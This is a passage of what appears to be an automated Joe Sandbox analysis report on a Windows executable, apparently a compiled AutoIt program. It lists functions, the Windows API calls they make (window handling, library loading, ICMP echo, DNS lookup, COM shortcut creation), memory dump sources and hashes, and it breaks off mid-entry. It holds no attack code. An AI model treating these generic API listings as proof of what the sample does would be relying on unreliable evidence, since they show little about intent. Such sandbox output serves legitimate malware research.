                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                              • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                              • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                              • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                              Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                              • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc
                                                                              • String ID: AU3_GetPluginDetails
                                                                              • API String ID: 145871493-4132174516
                                                                              • Opcode ID: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
                                                                              • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                              • Opcode Fuzzy Hash: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
                                                                              • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                              Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 3375834691-2298589950
                                                                              • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                              • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                              • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                              • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                              Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                              • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                              • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                              • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                              • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                              • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                              Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume
                                                                              • String ID: HH
                                                                              • API String ID: 2507767853-2761332787
                                                                              • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                              • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                              • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                              • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                              Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume
                                                                              • String ID: HH
                                                                              • API String ID: 2507767853-2761332787
                                                                              • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                              • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                              • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                              • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                              Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                              • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                              • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                              • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                              Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                              • gethostbyname.WSOCK32(?), ref: 0046BD78
                                                                              • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                              • inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                              • String ID: HH
                                                                              • API String ID: 1515696956-2761332787
                                                                              • Opcode ID: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                                              • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                              • Opcode Fuzzy Hash: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                                              • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                              Function 0046CD9A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                              • CoUninitialize.OLE32 ref: 0046CE50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk
                                                                              • API String ID: 886957087-24824748
                                                                              • Opcode ID: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                                              • Instruction ID: 634f95a1702cd93f148e07eb64efb4b351689d97c5b229aafe37579347e0b37e
                                                                              • Opcode Fuzzy Hash: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                                              • Instruction Fuzzy Hash: E821AF312083009FC700EF55C985F5ABBF4EF89724F148A6EF9549B2E2D7B5A805CB56
                                                                              Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                              • DrawMenuBar.USER32 ref: 00449828
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$InfoItem$Draw_malloc
                                                                              • String ID: 0
                                                                              • API String ID: 772068139-4108050209
                                                                              • Opcode ID: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
                                                                              • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                              • Opcode Fuzzy Hash: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
                                                                              • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                              Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AllocTask_wcslen
                                                                              • String ID: hkG
                                                                              • API String ID: 2651040394-3610518997
                                                                              • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                              • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                              • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                              • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                              Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                              • API String ID: 2574300362-1816364905
                                                                              • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                              • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                              • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                              • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                              Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpSendEcho
                                                                              • API String ID: 2574300362-58917771
                                                                              • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                              • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                              • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                              • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                              Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpCloseHandle
                                                                              • API String ID: 2574300362-3530519716
                                                                              • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                              • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                              • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                              • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                              Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpCreateFile
                                                                              • API String ID: 2574300362-275556492
                                                                              • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                              • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                              • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                              • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                              Function 0040EE70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                              • API String ID: 2574300362-3024904723
                                                                              • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                              • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
